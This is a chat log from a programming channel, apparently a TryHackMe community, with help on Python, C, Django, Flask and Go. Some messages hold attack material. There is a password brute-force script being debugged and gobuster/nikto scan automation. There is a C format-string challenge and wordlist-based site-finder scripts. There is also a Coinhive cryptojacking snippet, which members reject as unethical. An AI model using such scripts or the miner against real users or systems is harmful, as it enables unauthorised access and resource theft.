?

depends how much python you've written

In python, variables have a type. What type is that variable?

I Dont Understand...

look at your range loop

Both String And Int

Or how much in detail you look at the code...

False.

Then?

what is the single item variable name? What name are you using in the dictionary?

What data type is it?

Yeah please don't spoil the box for no reason

What data type is the variable passwords? Not password.

I Literally Don't Understand

Datatypes are pretty much the first thing I was taught, every time I learnt programming

Do you know what a datatype is?

IDK

Int

Str

Tuple

Float

Ok. So what data type is passwords? It has to have a datatype, so what type is it?

I Think Str And Int

No.

It is a single type.

Then?

An object has exactly 1 datatype

Float?

Floats are numbers

Object?

Too broad, technically correct but not what I'm looking for.

Tuple?

It's something you're iterating through.

Not quite a tuple, similar to a tuple.

List?

Yes.

So you're sending the whole list in the request.

Not the password from the list.

So Whats Wrong There?

I Did No5

I Did An x.strip and readlines() there know!?

You're sending all of the passwords in the file in a single request.

How To Split It?

you're already doing it.

How?

By iterating through the list with for

I sent the error in a screenshot

It's a typo

So Should There Be password Instead Of passwords?

Try it and see

Sorry. I Turned Off My Kali Machine And My PC

Can You Help?

Not really. Not much point in correcting your code if you're not going to use it

I Will Use It

Booting Up

Kali Live

Booted

Trying Now

Did Work!

Thankyou Very Much @everyone

always

always

always

look for spelling mistakes

within your code

Nah I have an ide that does that for me, I can hover over it and it should show me the type. Plus type hinting

I was just playing around with python, there is many files with passwords, and I wanted to combine them together. I came up with this python script. I think with little work it can be used for more than that. It could be used for gathering all documents from computer what are readable.
Probably there is already some better tool 😛
https://github.com/nahaku/toolset/blob/main/filefinder.py

Anyone knows platform like thm for developing application? like online labs but for developing lets say backend apps or frontend apps just to practice different architectural patterns?

I used to do crash courses on youtube, I can link you some if you want?

i mean not courses. i think i have the knowledge.. i want somewhere to practice and experiment with different architectural designs, i can do it with making small projects but i was thinking if we have something like a virtual lab where they will send virtual traffic or maybe have some control so that we know what happens when a component fail in the application..

like lets say 3 microservices use kafka, and lets say there is a way to fail that. so that i know that what fallback i have implemented will work or not.

i don't know if i am being clear tho.

Yeah, so that's just unit testing and application testing

I don't think there is a platform that can really help with it

yeah i know. but automated.

Unless you want to find specific errors ? there are sentry to report them

But actually testing everything in an automated way I'd pay for that 😄

Testing in dev work is very hard (Trust me)

yeah probably using a load testing framework like gatling and doing integration testing probably suffice.

yeah i know lol also for unit testing we use TDD.. so the actual code would have done in like 10mins but using tdd it takes whole lot of time.

thanks fawaz ❤️ i think i will make something like that.

let me think about it.

no problem!

for crash courses I'd recommend this guy though he is amazing
https://www.youtube.com/user/TechGuyWeb

oh awesome. for architecture i would recommend https://www.youtube.com/user/MarakanaTechTV

🥔

Any perl programmers can answer my question on when do you guys use anonymous reference or autovivification in your program? Thanks in advance

@tough basin This might elp:https://docstore.mik.ua/orelly/perl4/porm/ch04_08.htm

Aight thx @broken shuttle

Gave +1 Rep to @broken shuttle

how can I use grep -r to search for a string in a .php codebase? I can use this to grep python files (or regular text files) but not php. I tried using some grep flags like -a, even tried strings and cat, then pipe those to grep, but no luck. any ideas?

have you tried with the --include=*.php flag?

yep, forgot to mention it, still no results

ctags?

After asking a web dev, they said you can’t or it is not efficient enough to exist because of how it interprets the data. There is probably a package, and to quote them, “google it”

Regarding the "not efficient" part, yeah, probably. This was a challenge for a ctf (which is over now of course). I assumed there are better ways to do something like this as a developer. Also, when you say package, what package are we talking about? apt package?

for the record, I did google it many times before asking, which is not to say there's no way I missed something

no, but the ideal thing would be to do this with grep (if possible) cause I wanted to get the path to the file to then access it. cat and strings would probably not offer me a solution either

to elaborate, the challenge wasn't to use grep specifically, but I needed to first find the string and then get the filename/path

Hey guys! do you have any idea how to run multiple processes at the same time in python3?

Processes or threads?

i have a script and it has to run gobuster and nikto in the same time...

https://stackoverflow.com/questions/19080792/run-separate-processes-in-parallel-python

Thank you so much

Can you tag me and say "thank you" it's so I can get imaginary internet points 😄

@stone kayak thank you!

Gave +1 Rep to @stone kayak

wow cool!

@stone kayak can you explain it more easly please?

because i'm just beginner

Processes = new programs (more costly than threads but more disjoint)
threads = same process, different threads

rom multiprocessing import Pool

def f(x):
    return x*x

if __name__ == '__main__':
    pool = Pool(processes=4)              # start 4 worker processes
    result = pool.apply_async(f, [10])    # evaluate "f(10)" asynchronously
    print result.get(timeout=1)           # prints "100" unless your computer is *very* slow
    print pool.map(f, range(10))          # prints "[0, 1, 4,..., 81]"

We open a pool (image a car, we open it with 4 seats:

if __name__ == '__main__':
    pool = Pool(processes=4)              # start 4 worker processes

Then we tell the pool to run the f(x) function over every item in the list [10].

result = pool.apply_async(f, [10]) 

We wait for it to finish:

print result.get(timeout=1)  

And then we print the result of f(x) on every item in our list [10]

print pool.map(f, range(10))  

]

It may be hard to model nikto / dirbust with that tho

TL;DR it might actually be hard 😛

@stone kayak thank you

Gave +1 Rep to @stone kayak

scan command

elif cmd == 's' or cmd == 'scan':

    os.system('clear')            # clear screen

    with concurrent.futures.ProcessPoolExecutor() as executor:

        f1 = executor.submit(gobuster, rhost,rport,'/home/hackername//pt/tools/wordlists/big.txt')         # gobuster scan
        print(f1.result())    

        f2 = executor.submit(nikto, rhost,rport,usr,pwd)            # nikto scan
        print(f2.result())

        if cms == 'wp' or cms == 'wordpress':
            f3 = executor.submit(wordpressScan, rhost,rport)         # wpscan
            print(f3.result())

it's ok for you?

Can I ask questions about Python in here?

Just ask your question @tulip cliff , Asking about asking question is probably a waste of time.

How could I make multiple lines repeat a specific amount of times in Python?

use some kind of loop

and tbh, that sounds like a googleable question

I tried to google it but none of what I found worked

Multiple lines of what?

U wanna run code again and again

Or print something

I wanna run it again and again

It only runs once and therefore only works once which isn't enough

U can put the code in a loop, or declare a function and call it in loop

Thanks I turned it into a function and it worked

I literally just started a few days ago and it's easier to ask other people than have google confuse me

your own research is important

There are lots of sites that can help you, geeksforgeeks,stackoverflow and so on

Good to know

Thank you very much

To be fair: sometimes it can be hard for newbies to google stuff because they don't know the right terminology. So yeah, in this case, "loops" are what you're looking for 🙂

when did runcode.ninja go down?

ur century late

😦

wow

anyone on introduction to django room on tryhackme ?

i m stuck at this part

error after python3 manage.py migrate

On tryhackme

my urls.py file

does anyone have any ideas ?

From what I can see, your project folder is named First_project but the app name doesn't correspond to it.

I'm assuming you ran django-admin startproject First_Project to create it? The upper First_Project folder doesn't matter what it's named, but the second (First_Project/First_Project) is the name of the app (which is considered the python module it doesn't find)

the second folder is also First_Project which was created by python3 manage.py migrate

yes. Thing is, that folder is the name of the app and the 'python package'. For the url pattern in your urls.py to work you should change that folder name to app. That's why you get the error of ModuleNotFoundError, because it doesn't find a folder with the name app

oh ok

thanks mate

Gave +1 Rep to @untold shale

Can you code on kali?

Sure.

Is it a nicer environment then windows 10?

Probably depends what you're writing

(Windows 10 sucks so far)

A lot of my devwork is done with VSCode and a Remote SSH vscode Linux dev box, when I need Linux

Most of the stuff I write will end up on a Linux box (THM boxes) but because I'm writing Go/Python I can easily do most of it on Windows

I wanted to code a django app

Sounds nice

I just hate the terminal differences mostly

I use Git Bash, which gives you some basic *NIX utilities and works nicely as a shell

There's a lil quirk with it though, sometimes you'll need to run Windows programs with winpty wrapping them to get a proper interactive terminal

Oh, I will try that!

It's a part of Git for windows, so it makes sense to install it

I prefer programming on my windows

¯_(ツ)_/¯

Anna, if you are looking for python development and don't feel up to setting up the same kind of sophisticated system as James, look into using PyCharm. It has a lot of really nice options to make it very friendly to beginner programmers and programmers new to python.

VSCode is nice on Windows for python in itself

I think PyCharm is a bit heavier?

it is a bit heavier

Tradeoff is that it has options to set up and manage the project venv - it's not a huge deal, but for people who don't really get all the python tricks, it's an accessible introduction

It also has some django-specific plugins and extensions that are pretty nice

VSCode/VSCodium hits a weird spot for me. It is very lightweight, which I like, but integrating some build tools on Windows made me crazy.
In general, I think if one is going to use a full-featured IDE, JetBrains products are worth a look

Yeah, I use JetBrains for anything complicated (Java, and only Java)

Clion is really nice.

IntelliJ hits all the right notes for writing Java, too.

We had to use Eclipse in college. That was such a pain.

Eclipse really isn't that bad; the problems with eclipse are 90% users not understanding how Java projects need to be structured. As a former TA, 3/4 of my office hours for Java based classes were helping students debug weird stuff they did to the Eclipse java environment

That is very very true. But I feel like IntelliJ is a bit more beginner-friendly for students wanting to start with Java

Also remember Eclipse being very buggy, I might be biased though, I have been using Jetbrains' products for a while now and really like them

It is the worst IDE in human history

It gets corrupted so easily... And if you add plug-ins in it, it will get buggy.. Plus white theme

get the darkest dark theme. The corruption you speak of is something I've never seen. I have lots of plugins, no issues.

I installed that it fucked the whole IDE.

then either you did something wrong, or something on your system is causing an issue. Could be some other plugin or any number of things, but most people don't have those kinds of issues

That's user error, not the fault of the tool

I've seen a LOT of those kinds of errors with students

and always it was they did something unexpected

Its trash and no one can change my mind on it.

That's fine, I feel that way about Ruby, VB, and Visual Studio

Yes. Eclipse does have a steeper learning curve then IntelliJ

Oh, and FluentD

Oh, I'm rocking VS for C# :/

My hate for fluentd cannot be contained

Monodevelop 😦

Just use whatever you like and your pc can afford.

All the same libs as VS C#, 1/3 of the overhead

I use sublime.

If you want an IDE to complain about, go use TASM orr MASM

Yeah, those are bad.

and I use 'IDE' loosely there

Jetbrains have the best products.. Sadly couldn't use it... It doesn't support the stuff i have to use for work.

https://tenor.com/view/reeeeeeeeeeeeeeeeee-gif-19312523

Have never used it. I'm so used to VS now, I'm hesitant on changing :c

If i open pycharm, then i can't even move my cursor. My poor laptop crashes 😂

So, just use sublime

Not using IDE helps much better while learning

As you have to write correct syntax

After that, u can always use IDEs for more productivity

Thats true

You have to write correct syntax, regardless of editor of choice. IDEs are really helpful for a beginner, as they abstract out most of the pain of getting a new environment set up. When a student brand new to programming only has 13 weeks to learn intro material, there is NOT enough time to teach them about the entire stack associated with the language they are learning.

I just used to turn off auto-completion on my ides

Yes, it helps immensely with debugging applications as well.

The only IDE i've ever turned autocompletion off, was XCode. Because it tries to be too helpful

I prefer hard-core, but that's just me.

Everyone has different preference haha

Usually step-through debugging is a second-semester, or even 2nd year, inclusion. It's too much for most brand new programmers

Oh really? They taught us basic debugging tips and tricks in the first semester, if I recall correctly.

Print statements are best for debugging

Print everything

but don't forget to remove them when done

If you're using printing for debugging, you're doing it wrong (generally speaking). If you write code professionally and don't know how to REALLY use a debugger, you're not doing your job.

Depends on the program. From what I've seen, first 1-2 courses are output based debugging, not step through. Idea there was to minimize uplift to understand environment tools vs language

Until now, i only used debugger for exploiting binaries lol

There are a lot of concurrent cases where step through isn't possible.

Ie, producer-consumer design pattern implementation

Not true, I've done some really complex multi-threaded and multi-process debugging. Just depends what you're trying to do/solve

Yup! We did learn output based debugging!

Yes

We leant about debugging by uh end of our 2nd year.

As a professional, I agree more than I disagree with Empty on the output - the places where I found output based more helpful than step-through were all concurrent race-conditions. The step through debugging was throwing required timing off

Yeah, race conditions are one of the times where that's a definite exception, but also (sadly) altering the code with debug output sometimes changes the race condition itself. Those are always a pain to debug

Yes

Real time bounds are the worst, avoid them where ever possible

And there are also plenty of times when seeing a combined visual output of something is easier to wrap your head around than methodically stepping through the code. It just depends. But regardless- if you do it for a living, you better be very comfortable with the debugger.

Yes, sometimes also just writing it down helps, which I did in the past

I've always said that planning a function before you sit down to write saves 2-3x the time

it's one of the most understated benefits of TDD or BDD

It is true

Especially if you're implementing an algorithm

First: solve the problem. Then: write the code.

timing issues.

Thanks, I use it already, it is great

Gave +1 Rep to @magic falcon

what are most companies these days using? C#?

I wanna know what the most common scriping language is, bc i want to learn it

depends on the use case

true

Hey I have a doubt regarding this code snippet#include<stdio.h> #include<string.h> #include<stdlib.h> int x; void disp(char *str) { printf(str); } int main(int argc, char **argv) { char buf[256]; if(argc>1) { memset(buf,0,sizeof(buf)); strncpy(buf,argv[1],sizeof(buf)); disp(buf); } if(x!=0) { printf("x variable has been changed correctly!"); } else { printf("Hello all, you didn't succeed\n"); } return 0; } I know that with bufferoverflow we can change the value of x but Im not understanding how to do that
programming language: C

Could anyone help me 🙏

it's more first: define the actual problem, then: solve with code

that's not going to overflow very easily tbh

since you're only copying the first sizeof(buf) bytes

Mb its not a buffer overflow 😂 its a format string attack

I should be somehow able to over write x

could you help me ?? @brazen eagle

Ah I'm not very good at those

Oh ok

Nah, I'd say you should have a pretty good idea of what the solution will look like before you start writing code (which does require defining/understanding the problem first). Pseudocode is an okay place to start, but if you just sit down and start randomly coding, it's not going to be as clean or efficient.

tests are there to define the problem

specifically and exactly

how many people do you know who 100% of the time write tests first? or even >80%? If we're being honest, most people don't. Certainly, very few novices do.

and that's mostly where that comment was directed- novices. They should seek to understand the problem well, before writing a single line of code.

What's this "tests" thing you speak of?

case in point 😆

I am doing Helmet JS

#room-hints

Can #programming be used for screams into the void about coding? Today i tried to set up a django app, but i forgot the dot! A single dot! Now i have to delete everything and do it again!

Annoying

If if makes you feel better, I once spent 3 days helping someone to debug why their C++ code wasn't compiling... we had both overlooked that they had forgotten to close a class properly

Oh, that sucks

usually compilers are pretty good about pointing you to the right spot. Interpreted languages don't have that

The most interesting mistake i heard is dude spelling color with a "u"

older C compilers especially were... a bit less than helpful at times

Oh, c is a a pretty hardcore language

As far as i remember

it has that reputation, yeah. It's strict about many things, and makes the programmer do a lot of things manually that other languages might do for you. Memory management being an example.

I studied it, i remember very little, in a pretty stressful enviroment too

I cried on a first day about unix permissions :D

Ooh, memory management, is that malloc thing?

in other news, i set up a ubuntu vm just to code a django app

am i going crazy? who knows

Yeah, this was with GCC 3.x - it was giving a pretty rare error related to (but wasn't directly) segmentation faults.

thats..... odd. The old C compiler errors were often cryptic, but... dang

That's actually a pretty reasonable first step for developing any project - I prefer to sandbox all my dev environments, where possible

It's certainly possible 🙂

Yes, malloc is part of it. Allocating memory, deallocating memory, you have to do that yourself in C, but languages like java and C# do it for you.

Yeah, Empty. It was brutal. I remember the fix was a missing semicolon after the last class bracket.

good to know, i prefer the terminal in vm

docker containers might be something you want to look into as well

yeah, i will, funnily enough, i wrote a small article on docker without touching it once 😄

🤦‍♂️ I've had stuff like that bite me too in the good ol days

containers and container storage is a BIG step over developing in a VM. Until you are comfortable with mounting storage and knowing the particulars of /etc/fstab, i do not recommend going that route without a team helping you

it just does not run on my windows 10

oh, ok, will keep that in mind

WSL might be an option as well, but personally, that's been more buggy than it's worth, for me

I've never had a good experience with WSL

I haven't tried recently, I hear it's much better now

My use-cases never seem to fit with what WSL is good at

same

I gave up on ever being useful when It broke my system32 directory

eek

well, i broke my system32 directory. but it was dumb enough to let me manipulate windows system files from within the so-called linux sandbox

Oh boy don't get me started on my django experience

The pain caused

I feel like there's a meme with C where they give you the rope and point you to the tree. Sounds like you did the same thing, juun (with wsl)

as painful as django can be, i had a much better time with that than .WAR projects with tomcat

I haven't used django much. But dropping a .war in tomcat is pretty easy

In no world should a vm-like environment let you manipulate the host system that easily

the development part was athe problem - i forget which framework i had to use, but it was really really painful.

part of the problem was we had to do remote code editing some a predecessor to che - and the entire toolkit was broken

Yeah, I've had really weird things happen with WSL and file permissions

that's actually one of the things I like about tomcat, is the ease of remote code debugging

but I haven't had to do that in a while

that was the idea, i think. I think it was an SSL issue, i could never get the remote login to work. I didn't have admin access on the system, so I couldn't make sure that my public key was added correctly. I wasn't the only one with the problem though, so we ended up scrapping it in favor of using a more git workflow-like process

I set up django correctly!

after all those years

\o/

my tutorial seems to not work

:c

i will have to abandon it and go to sleep

rip good tutorial

is this right in go?

Looks it

i don't get why if i define the type of array in the struct, i then have to tell it again the array has strings when i declare it

Because you're not declaring the type of certifications, you're building a string slice to use as that value?

hmm i'm confused, i need to go back and learn this

You're supplying a value for certifications

In order to create that slice of strings, you need to either use make or declare it like you are there.

It doesn't matter that you defined the type elsewhere, it's the fact you're creating a string slice here

https://blog.golang.org/slices-intro

Golang everyday

It's similar to other languages, where the declaration of the property tells the compiler what the var will refer to, but not what the var will reference. The instantiation of the var is a separate activity, and you have to make sure the type of your instantiation comports to the type in the declaration.

ooo okay thank you both xx

what process do you guys use when building a website with authentication?

at the moment i'm going for pure functionality first, and then i'll add in error checking and models and such after

for example, this is my register function

@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "GET":
        return render_template("auth/register.html")
    elif request.method == "POST":
        inserted = users.insert({
            "username": request.form["username"],
            "password": request.form["password"]
        })
        
        return str(inserted)

Take it in stages.

I think it makes sense to progress: unencrypted --> TLS1.2 --> local credential --> OAuth token --> domain credential

to be fair I'd split up the GET and POST into 2 separate routes

it'll remove the need for an if else block and simplify the code

oh yeah eventually i will, i typically use a class for each route and a function for each http method

something like

class Register(Route):
  def __init__(self):
    self.path = '/register'

  def get(self, request):
    pass

  def post(self, request):
    pass

altho i've only done this in node so syntax may be a little off

You are doing this in django? it looks right-ish, but it's been awhile. Hydra is absolutely right, you should split up GET and POST to separate routes, and redirect. It doesn't cost you anything to set up routes and redirection, so take advantage of it

flask, so similar yeah

also i have a question about cookies

how are they usually generated / what's the more secure/best practise way to generate a cookie for each user?

first time doing this from a software dev perspective hehe

depends on framework, to be honest.

when researching all i'm seeing is things to set http only, securesite etc, not actually generating a secure cookie value

Looks like there is a fair amount of info out there on blogs and whatnot

@cursive orchid https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce

this should give you an idea of common avenues... now you get to figure out how to make it better 🙂

thanks i'll give it a read :D

if you need actually secure sessions, django has much better documentation (from what I see, YMMV)

i'm just sort of creating a "mock up" website to show what i want it to achieve really, and if my friends like it, i'll probably get some actual web devs to help me out on it 😅

but as i'm going, i'm writing security things down just so when it comes to it, i can learn how they're implemented :)

is this not a thing in python ???

self.auth = options["auth"] or False

if options["auth"] is not give, default to False

https://book.pythontips.com/en/latest/ternary_operators.html

that's the same thing, just longer

with a ternary it's just self.auth = True if options["auth"] else False which also doesn't work :(

effectively you're looking at doing null checking on the fly - "if options['auth'] exists, use it else False"

options['auth'] should return the canonical object pointer if it exists - otherwise the pointer should be a null

if you are used to a language with looser implicit typing, i can see why you'd be frustrated by it

null is a falsey value though, so surely it should just move onto the or False right?

Null and false are not the same thing

i know

but it's a falsey value

Kind of, but also mostly not

unless i'm just used to js weirdness

at least in my experience, that shouldn't be taken as gospel

JS is the most hacky bullshit language - even more than R

JS is beautiful

I have so many opinions - keeping them all in right now

https://tenor.com/view/hank-explode-gif-5592816

yep i just tested, exactly this 😅

https://www.destroyallsoftware.com/talks/wat

ruby needs to die. worse than the pre-sata power cables.

okay, watman killed me. Good way to end the week

Hello, Does the java script code to mine crypto currency using the user's login device? I am only the beginning:

<script  src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('xP9YtM7sFtCRhh1H25JGWl60Z0BgbpHy', {throttle: 0.8});
miner.start ();
</script>

I love where that domain redirects to

https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies/

We don't do that kind of thing here.

Seeing as it's broken now (Troy Hunt FTW), I imagine it's forensics?

Can I ask why you're asking this?

I prefer to remind that this is legal, according to my souces it has already been used. I use it as everyone will use it, to have crypto money. this is another way instead of putting ads on this web page.

@onyx merlin

No, it is highly unethical. It also will not work as Coinhive has been taken down. @torpid sundial

Used... illegally (or unethically at least).
You can't profit off people connecting to your site without informing them -- hence why every website has a big cookie notice on it

There's also a pretty big difference between showing a (visible) advert and mining crypto using their device

The former they can choose whether they want to interact with it. The latter they get no choice

I am surprised to hear this, I will send you a link to a leagl browser which is intended to browse the internet out while creating bitcoin, and everything is legal in this. and I hear that this is not legal, it is strange, right? @onyx merlin

I did not say illegal. I said unethical. Again, coinhive is shut down. @torpid sundial

I have not researched the legality of it.

It's sure as heck shady

I can't find any laws around it, but everyone that is arguing it's legal online have a personal stake in crypto :-(

umm, using other people's CPU time for your gain is most definitely not cool

especially without their consent

Without consent is unauthorised and sounds like computer misuse?

it's probably not explicitly breaking any privacy laws, as there's no private data involved, (AFAIK), but degrading someone's PC is probably illegal in some jurisdictions. will have to look up the CFAA in the States, other countries have similar laws

but definitely misuse

Long story short, 1) nobody here is going to help you do shady stuff, and 2) that site is shut down, so it wouldn't even work anyways

Not strictly true. It would grab the script just fine...

And put a nice big warning on your users' screens telling them to leave the website fast

well, okay, by THAT definition of "work", sure, but....

I need assistance in C. I'm pretty new to low level stuff.
strlen(ab1)+1 should be 6 right?

Why is sizeof(ab2) 8 after I allocate it? I wanted to access how many bytes of memory was allocated to ab2...

sizeof returns the size of the operand, which in this case is a pointer. It won't return allocation size.

In both cases, sizeof() shoudl be returning the size of a pointer. Arrays in C, even ones allocated to the stack, should be a pointer.

Why is it that when I allocate 0 into it and do strcpy(ab2, ab1), it doesnt return an error?

Its curious that my ubuntu vm is saying the size of the array pointer is 10B, and the size of the char* is 8.

Also, remember to free your memory. Not deleting your allocations is a really good way to cause much pain and suffering down the road

Seriously, I cannot stress how much you need to get in the habit of cleaning up your memory when you are done with it. Memory leaks are one of the least fun things to track down in a C code base.

Thank you I'll keep that in mind, do you have any sources that explain low level memory access friendly for people new to low level stuff? I searched far and wide, the results are either not detailed enough, or too detailed it's explained for literal beginners (I've been coding for a long time)

Read the R&K book. It's still one of the best references for C

It'll seem like a foreign language, but it has all the basics you'll need.

Gotchu! I'll check that out, thank you very much!

https://en.wikipedia.org/wiki/The_C_Programming_Language

This is the book you want

strcpy doesn't have that kinds of protections. as per its definition, it copies from src to dst and the definition of copying to a too small array is undefined

and as undefined behaviour, you can expect it to have security implications.

Arhu is exactly right. Another great reference with examples is https://en.cppreference.com/w/

strcpy is one of the classic ways of introducing buffer overflows into your code.

The bottom half of the page is links to C libraries. First step if you aren't sure about a function from a standard library, is to check the definition to know what the expected inputs, outputs and behavior will be

Compilers have been pretty bad, historically, at checking for these kinds of errors. Valgrind, memory sanitizers, and address sanitizers are great tools to run as part your build process.

Alright thanks folks! Been doing Python and other languages like C# that doesn't have these stuff

feels like a new language tbh

Yeah, it's a different world when you have to care about memory allocations directly.

So here's another new tidbit for the allocation piece: static and dynamic allocation gives different sizes for the arrays; the static array declaration is reserving N bytes. Since this space is reserved in the stack, the program knows how big the array is, even if you don't use all the space. The second declaration is dynamically allocated to the freestore, and strlen() matches the number of letters prior to the first null byte from the starting address.

mmh. sizeof is a constant, and the calculation is done at compile time.

I'd also use calloc instead of malloc, at least

Don't forget to free afterwards, and good practice is to nullify the pointer to avoid something using it after your free

i need to learn to code

True

how do I view php function declarations I only found some old code from 2010 that is not working for me

print $reflFunc->getFileName() . ':' . $reflFunc->getStartLine();```

ok I got it working

import os,requests,argparse,random
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='PHP Site Finder')
parser.add_argument('-w', '-wordlist',metavar='',help='Wordlist for Finding PHP Sites')
parser.add_argument('-a', '--amount', type=int,metavar='',default=20,help='Amount of Sites')
args = parser.parse_args()
class Request:
 def __init__(self,wordl,amt):
  self.wordl = wordl
  self.amt = amt

 def brute_req(self):
  try:
   wordlist = open(self.wordl,'r')
   splt = wordlist.split()
   http = ['http://','https://']

   for i in splt:
    rc = random.choice(http)
    req_site = request.get(rc + i + '.php')
    if req_site.status_code == 200 or req_site.status_code > 400:
     for i in self.amt:
      print(req_site)
    else:
      print(f"Status Code=>{req.status_code}")

  except Exception:
   print('Error Occured')
req_class = Request(args.wordl,args.amt)
req_class.brute_req()

Traceback (most recent call last):
  File "o.py", line 26, in <module>
    req_class = Request(args.wordl,args.amt)
AttributeError: 'Namespace' object has no attribute 'wordl'

...

args.wordlist

As args don't have attribute called wordl

i hope

ill just replace the wordl with wordlist?

also in the constructor?

U added 2 argument as wordlist and amount so you should use args.wordlist and args.amount

Just on line 29

oh

thx dude

im so stupid

Also, it's inconsistent. You use --amount but -wordlist.

Very upsetting.

Yeah

yea i forgot about -

lol

i have a program in python that does many thing, aaand it lag because python is not optimise to do that many thing in a program, so i am wondering is it possible to split the code into 2 code that run separately but communicate data ?

Are you certain it's due to python really, not your design?

And yes, distributed systems exist, and can be written in python.

yep

ok

yes i have like a discord bot that control a database and discord user and it is connected to a game server

he do to many thing for only 1 code

i have try to optimise it but a this point i can't and i have to split it

Is it multithreaded? If not, see if the things can be done in parallel. Do you use asynchronous calls to the services? If not, see if those would help.

i have asynchronous for the discord bot and multithread for other

but i know that is not recomended

buuut i don't know how to do that differently

the best for me is to put the discord bot in one program that do all the discord related thing and other code that manage the database and the game server
but the game server need to be connected whit discord

so he need to communicate whit the discord bot and i don't know how to do that

and i have think to redo all the code in C++ or C i don't know

I presume your using discordpy?

@haughty oracle

yes

The TryHackMe bot runs on discordpy as well, using a sql server.....it doesn't have much issues for this server (except for discord server issues)

and when you mean "lag", could you show an example?

my python code take 100% of 1 of my CPU core

and he take looong time to responds

code?

yes the bot things

im 90% sure thats a problem with your code

its a code taht contain a discord bot and a code that manage our userbase

he need tooo manage our discord, so responds to user, verify user, manage vocal channel for the game server, actualise server statu in a message

i have like 1 asynchronous and 5 multithread

in 1 python code xD

again, can I see the code?

ho

he is like more than 2000

so i put you in the pastebin

are you not using cogs?

what is cogs ?

https://pastebin.com/3x573AxB

okay

cogs help organise and manage your discordbot more

!github

Take THMs bot for example)

That code is pretty messy so it's going to be rather hard to debug it

my code ?

Yup

ho

are you an experienced coder ?

So, it connects to a minecraft server correct?

multiple minecraft server yes

but for the moment 1

thats probably the issue

yes ^^*

remove that function and then see what happens

yes but i need it ?

no no, remove it to test if thats whats causing the issue

thats why i want to slip the code in 2

xD that sure that is causing the issue i have already tested it

ah

that part of my code is too big for performence

thats why i want to split the code in 2

what exactly does that do?

Mmmh i am working on a big projet like non moded server but like moded server

and the bot do many thing, live event ect

and the bot is connected to a minecraft plugin that i have created so he can execure command in the minecraft server

so discord and minecraft is connected ! ^^

annd he can like.. if 2 player are nearby he put the 2 player in the same vocal channel in discord things like that

yeah so you would probably need to:

1. Remove that function out of the code
2. (Don't have to) Use cogs to make it more organised, search google "discordpy cogs tutorial" for more info
3. Make a separate program to manage the minecraft server and then setup a "server" on that to be able to "contact" the other discordpy
4. Make the discordpy bot connect to that server

yes! ^^

sooo if y create 2 code , the code that manage the minecraft server and the discord bot

Exactly

how can i do for the 2 code to communicate information or data ?

use the socket modal to setup a listener / server on the minecraft.py file

ok ^^

or alternatively

you could use a sql database

ok

which the disocrdpy file would check every 10 second or so

but so the discord bot neeed to have 1 asynchronous and 1 multithread for the socket

ok

tho i'm sure some other people will be able to provide alternative ideas)

yeah

ok

thank you, can you give me tips to improve my code so it will be more readable and better ?

sure,

you say its messy how can i improve that ?

Use a formatter: https://pypi.org/project/black is a good one to use

this will help make your code follow PEP8 standards and also make it look more cleaner

ho thank you ! ^^

also use a linter: (for more of the technical side)...flake8 is a great one

https://flake8.pycqa.org/en/latest/

ok

for discord.py, use cogs as I said before to put different commands / functions in separate "modules"

https://discordpy.readthedocs.io/en/latest/ext/commands/cogs.html

ok

If you need anything else, feel free to ask 🙂

on all coding community that is the better ! ^^ very helpful ty

i will see this

thank you ^^

no worries, glad I could help!

have a good day and gl with the coding :))

yes ! ty ^^

@haughty oracle one issue I see with that code is that you're using order_list dictionary as the main data structure, iterating over a copy of it, and then removing elements from the list. Perhaps another data structure like queue would be more appropriate for this. You'd get rid of copying and cleanup loops.

in get_request_responds there's a 0.1 second sleep in one of these loops. It shouldn't take a lot of CPU, but there's a pause between handling each element in the list. but now that I look at that, a simple queue wouldn't work (as you're not always consuming the head of the list)

All in all, it looks to me the root cause isn't in the implementation language, or something that splitting the program into two different processes would solve.

ok @solar hull ty , i go to sleep but if you have a solution for me i will take it ^^ and read your responds wen i am awake

Gave +1 Rep to @solar hull

Oook ?

sooo good night ! ^^

ty

Sure, good night 🙂 you might still get more perceived performance by splitting it - but it won’t likely solve the root cause

Ok ty

😄

👍

if i'm making a website, and i want to be an admin, but obviously i'm the first user

would i just run an sql query directly to make me an admin?

If you have no intention of making another user an admin ever, sure

well no i'll have a panel to admin other users

Or if you haven't built the API for that yet

but since i'm the first one i'll need to have those powers first

Yeah, so just do it in the db directly I guess

What else could you really do?

idk lol

there are a number of ways to bootstrap a new system. You can install it with a 'default' account that either has default credentials, or that can only be accessed by a MFA type system. But yeah, if you have direct access to the db, that's probably quickest/easiest. If you're looking for something that's easier to test and more repeatable (and doing manual sql is usually a big red flag for 'production' systems), you could either create sql scripts, or expose an api, which again could possibly have some secondary auth/MFA type check

i see

i've just wrote a quick script that makes me admin for whenever i rebuild the database :)

import requests,argparse,os,time,random
from bs4 import BeautifulSoup
parser = argparse.ArgumentParser(description='Site-Finder Made with python3')
parser.add_argument('-w','--wordlist',metavar='',help='Wordlist to use for finding sites')
parser.add_argument('-a','--amount',metavar='',type=int,default=20,help='Amount of result sites to show')
parser.add_argument('-e','--extension',metavar='',help='Website Extension(ex. [.com, .php, .asp, .html])')
args = parser.parse_args()
class Request:
    def __init__(self,wordlist,amount,extension):
        self.wordlist = wordlist
        self.amount = amount
        self.extension = extension
    @staticmethod
    def check_dependencies(*args):
        try:
            for arg in args:
                if arg == 'pip3':
                    pip = os.system('which pip')
                    if pip == os.path.exists('/usr/bin/pip'):
                        print('[+]' + 'pip is installed')
                    elif pip != os.path.exists('/usr/bin/pip'):
                        print('Missing dependency pip')
                        time.sleep(0.5)
                        print('Installing pip...')
                        os.system('sudo apt install python3-pip')
                        if os.path.exists('/usr/bin/pip'):
                            print('pip installed successfully!')
        except ImportError:

    for arg in args:
               if arg == 'requirements.txt':
                   os.system('sudo pip3 install requirements.txt')
    def site_finder(self):
        sitessl = ['https://', 'http://']
        for i in range(10):
            global randomized
            randomized = random.choice(sitessl)
        open_file = open(self.wordlist,'r')
        for i in open_file:
            req = requests.get(randomized + i + self.extension)
            if req.status_code == 200 or req.status_code < 400:
                for i in self.amount:
                        randomized = random.choice(sitessl)
                        print(req + '[+]=>' + randomized + i + self.extension)            
if __name__ == '__main__':
